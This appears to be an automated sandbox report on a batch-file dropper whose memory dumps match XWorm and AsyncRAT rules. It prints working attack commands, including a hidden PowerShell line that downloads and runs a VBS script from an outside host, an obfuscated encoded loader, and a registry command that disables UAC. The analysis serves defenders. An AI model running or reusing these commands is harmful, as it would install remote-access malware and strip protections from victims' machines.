'DACcAJwAgACgAZQ' + [char]66 + 'wAHkAVA' + [char]66 + '0AGUARwAnACAAPQArACAATw' + [char]66 + 'tAG0AZg' + [char]66 + 'SACQAOwAgACcALgApACAAcg' + [char]66 + 'GAGQAWQ' + [char]66 + 'SACQAIAAoAGQAYQ' + [char]66 + 'vAEwALg' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + '0AG4AZQ' + [char]66 + 'yAHIAdQ' + [char]66 + 'DADoAJwAgACsAIAAnADoAXQ' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + 'wAHAAQQAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAJwAgAD0AKwAgAE8AbQ' + [char]66 + 'tAGYAUgAkADsAIAAnADsAIAApACAAKQAnACcAQQAnACcALAAnACcAkyE6AJMhJwAnACgAZQ' + [char]66 + 'jAGEAbA' + [char]66 + 'wAGUAcgAuAEcAZQ' + [char]66 + 'hAHkAcgAkACAAKA' + [char]66 + 'nAG4AaQ' + [char]66 + 'yAHQAUwA0ADYAZQ' + [char]66 + '	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\nicme.ps1'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\nzans.ps1'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\qndib.ps1' ";exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\qndib.ps1' ";exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\qndib.ps1' ";exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\qndib.ps1' ";exit

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 15_2_00007FFD9B9530E9	15_2_00007FFD9B9530E9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 16_2_00007FFD9B9730E9	16_2_00007FFD9B9730E9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 28_2_00007FFD9B960B3D	28_2_00007FFD9B960B3D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 45_2_02AD0EC0	45_2_02AD0EC0

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 16448
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 2728
Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 16448	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 2728	Jump to behavior

Source: 64.2.powershell.exe.208006e8178.1.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 64.2.powershell.exe.208006e8178.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 49.2.powershell.exe.26c57b16cb8.0.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 49.2.powershell.exe.26c57b16cb8.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 45.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 45.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 57.2.powershell.exe.117de8f7d58.0.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 57.2.powershell.exe.117de8f7d58.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 41.2.powershell.exe.2002c7f3a58.1.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 41.2.powershell.exe.2002c7f3a58.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 28.2.powershell.exe.22801af67f0.0.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 28.2.powershell.exe.22801af67f0.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 41.2.powershell.exe.2002c7f3a58.1.raw.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 41.2.powershell.exe.2002c7f3a58.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 49.2.powershell.exe.26c57b12b58.1.raw.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 49.2.powershell.exe.26c57b12b58.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 28.2.powershell.exe.22801af2690.1.raw.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 28.2.powershell.exe.22801af2690.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 49.2.powershell.exe.26c57b16cb8.0.raw.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 49.2.powershell.exe.26c57b16cb8.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 64.2.powershell.exe.208006e8178.1.raw.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 64.2.powershell.exe.208006e8178.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 57.2.powershell.exe.117de8f7d58.0.raw.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 57.2.powershell.exe.117de8f7d58.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 64.2.powershell.exe.208006e4018.0.raw.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 64.2.powershell.exe.208006e4018.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 57.2.powershell.exe.117de8f3be0.1.raw.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 57.2.powershell.exe.117de8f3be0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 41.2.powershell.exe.2002c7ef8e0.0.raw.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 41.2.powershell.exe.2002c7ef8e0.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 28.2.powershell.exe.22801af67f0.0.raw.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 28.2.powershell.exe.22801af67f0.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000039.00000002.2339225011.00000117DEAC8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000029.00000002.2133873133.000002002C6C4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000039.00000002.2339225011.00000117DE7E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000031.00000002.2238659527.0000026C579E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000001C.00000002.1894952447.0000022801A23000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000031.00000002.2238659527.0000026C57CE7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000002D.00000002.2121324006.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000040.00000002.2420990292.00000208005B6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000001C.00000002.1894952447.0000022801CC4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000029.00000002.2133873133.000002002C9C3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000040.00000002.2420990292.00000208008B8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: Process Memory Space: powershell.exe PID: 2080, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 2300, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7904, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 8644, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: 28.2.powershell.exe.22801af67f0.0.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 28.2.powershell.exe.22801af67f0.0.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 28.2.powershell.exe.22801af67f0.0.raw.unpack, AlgorithmAES.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 41.2.powershell.exe.2002c7f3a58.1.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 41.2.powershell.exe.2002c7f3a58.1.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 41.2.powershell.exe.2002c7f3a58.1.raw.unpack, AlgorithmAES.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 49.2.powershell.exe.26c57b16cb8.0.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 49.2.powershell.exe.26c57b16cb8.0.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 49.2.powershell.exe.26c57b16cb8.0.raw.unpack, AlgorithmAES.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 57.2.powershell.exe.117de8f7d58.0.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 57.2.powershell.exe.117de8f7d58.0.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 57.2.powershell.exe.117de8f7d58.0.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 57.2.powershell.exe.117de8f7d58.0.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 41.2.powershell.exe.2002c7f3a58.1.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 41.2.powershell.exe.2002c7f3a58.1.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 28.2.powershell.exe.22801af67f0.0.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 28.2.powershell.exe.22801af67f0.0.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 49.2.powershell.exe.26c57b16cb8.0.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 49.2.powershell.exe.26c57b16cb8.0.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 64.2.powershell.exe.208006e8178.1.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 64.2.powershell.exe.208006e8178.1.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.spre.troj.spyw.expl.evad.winBAT@115/95@9/6

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8652:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2056:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1620:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5272:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4192:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9076:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6480:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Mutant created: \Sessions\1\BaseNamedObjects\KmNubOoGsw3EMIcM
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8604:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9032:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6804:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zdzqt4v2.lvb.ps1

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\z1Documents_pdf_.bat" "

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle hidden -command "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$YCEnA; $TDILN = (New-Object Net.WebClient);$TDILN.Encoding = [System.Text.Encoding]::UTF8;$YCEnA = $TDILN.DownloadString( 'https://teldrum.ro//images/globalx1.vbs' );$dYOsY = [System.IO.Path]::GetTempPath() + '\x.vbs';$YCEnA | Out-File -FilePath $dYOsY; wscript.exe //nologo $dYOsY"

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\z1Documents_pdf_.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle hidden -command "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$YCEnA; $TDILN = (New-Object Net.WebClient);$TDILN.Encoding = [System.Text.Encoding]::UTF8;$YCEnA = $TDILN.DownloadString( 'https://teldrum.ro//images/globalx1.vbs' );$dYOsY = [System.IO.Path]::GetTempPath() + '\x.vbs';$YCEnA \| Out-File -FilePath $dYOsY; wscript.exe //nologo $dYOsY"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" //nologo C:\Users\user\AppData\Local\Temp\\x.vbs
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $hzjmp = 'Ow' + [char]66 + '9ADsAIA' + [char]66 + 'pAFQAQw' + [char]66 + '2AFgAJAAgAGUAbA' + [char]66 + 'pAEYALQAgAHMAcw' + [char]66 + 'hAHAAeQ' + [char]66 + 'CACAAeQ' + [char]66 + 'jAGkAbA' + [char]66 + 'vAFAAbg' + [char]66 + 'vAGkAdA' + [char]66 + '1AGMAZQ' + [char]66 + '4AEUALQAgAGwAbA' + [char]66 + 'lAGgAcw' + [char]66 + 'yAGUAdw' + [char]66 + 'vAHAAOwAgAGUAYw' + [char]66 + 'yAG8AZgAtACAAIA' + [char]66 + 'pAFQAQw' + [char]66 + '2AFgAJAAgAGgAdA' + [char]66 + 'hAFAAZQ' + [char]66 + 'sAGkARgAtACAAZQ' + [char]66 + 'sAGkARgAtAHQAdQ' + [char]66 + 'PACAAfAAgAE8AbQ' + [char]66 + 'tAGYAUgAkADsAIAApACAAJwAxAHMAcAAuADMAMA' + [char]66 + 'sAGwAZAAnACAAKwAgACkAKA' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAHAAbQ' + [char]66 + 'lAFQAdA' + [char]66 + 'lAEcAOgA6AF0AaA' + [char]66 + '0AGEAUAAuAE8ASQAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAAoACAAPQAgAGkAVA' + [char]66 + 'DAHYAWAAkADsAIAAnADsAKQAgACkAIAAnACcAbQ' + [char]66 + 'zAGEAZw' + [char]66 + 'lAHIAXAA5ADEAMwAwADMALgAwAC4ANA' + [char]66 + '2AFwAaw' + [char]66 + 'yAG8Adw' + [char]66 + 'lAG0AYQ' + [char]66 + 'yAGYAXA' + [char]66 + '0AGUAbgAuAHQAZg' + [char]66 + 'vAHMAbw' + [char]66 + 'yAGMAaQ' + [char]66 + 'tAFwAcw' + [char]66 + '3AG8AZA' + [char]66 + 'uAGkAdw' + [char]66 + 'cADoAYw' + [char]66 + 'EAEQAIA' + [char]66 + 'EACcAJwAgACwAIAAnACcAJQ' + [char]66 + 'JAGgAcQ' + [char]66 + 'SAFgAJQAnACcAIAAsACAAJwAnAGgAdA' + [char]66 + '0AHAAcwA6AC8ALw' + [char]66 + '0AGUAbA' + [char]66 + 'kAHIAdQ' + [char]66 + 'tAC4Acg' + [char]66 + 'vAC8ALw' + [char]66 + 'pAG0AYQ' + [char]66 + 'nAGUAcwAvAGcAbA' + [char]66 + 'vAGIAYQ' + [char]66 + 'sAHgAMQAuAGoAcA' + [char]66 + 'nACcAJwAgACgAIA' + [char]66 + 'dAF0AWw' + [char]66 + '0AGMAZQ' + [char]66 + 'qAGIAbw' + [char]66 + 'bACAALAAgAGwAbA' + [char]66 + '1AG4AJAAgACgAZQ' + [char]66 + 'rAG8Adg' + [char]66 + 'uAEkALgApACAAJwAnAEkAVg' + [char]66 + 'GAHIAcAAnACcAIAAoAGQAbw' + [char]66 + 'oAHQAZQAnACAAPQArACAATw' + [char]66 + 'tAG0AZg' + [char]66 + 'SACQAOwAgACcATQ' + [char]66 + '0AGUARwAuACkAIAAnACcAMQ' + [char]66 + 'zAHMAYQ' + [char]66 + 'sAEMALgAzAHkAcg' + [char]66 + 'hAHIAYg' + [char]66 + 'pAEwAcw' + [char]66 + 'zAGEAbA' + [char]66 + 'DACcAJwAgACgAZQ' + [char]66 + 'wAHkAVA' + [char]66 + '0AGUARwAnACAAPQArACAATw' + [char]66 + 'tAG0AZg' + [char]66 + 'SACQAOwAgACcALgApACAAcg' + [char]66 + 'GAGQAWQ' + [char]66 + 'SACQAIAAoAGQAYQ' + [char]66 + 'vAEwALg' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + '0AG4AZQ' + [char]66 + 'yAHIAdQ' + [char]66 + 'DADoAJwAgACsAIAAnADoAXQ' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + 'wAHAAQQAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAJwAgAD0AKwAgAE8AbQ' + [char]66 + 'tAGYAUgAkADsAIAAnADsAIAApACAAKQAnACcAQQAnACcALAAnACcAkyE6AJMhJwAnACgAZQ' + [char]66 + 'jAGEAbA' + [char]66 + 'wAGUAcgAuAEcAZQ' + [char]66 + 'hAHkAcgAkACAAKA' + [char]66 + 'nAG4AaQ' + [char]66 + 'yAHQAUwA0ADYAZQ' + [char]66 + '
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
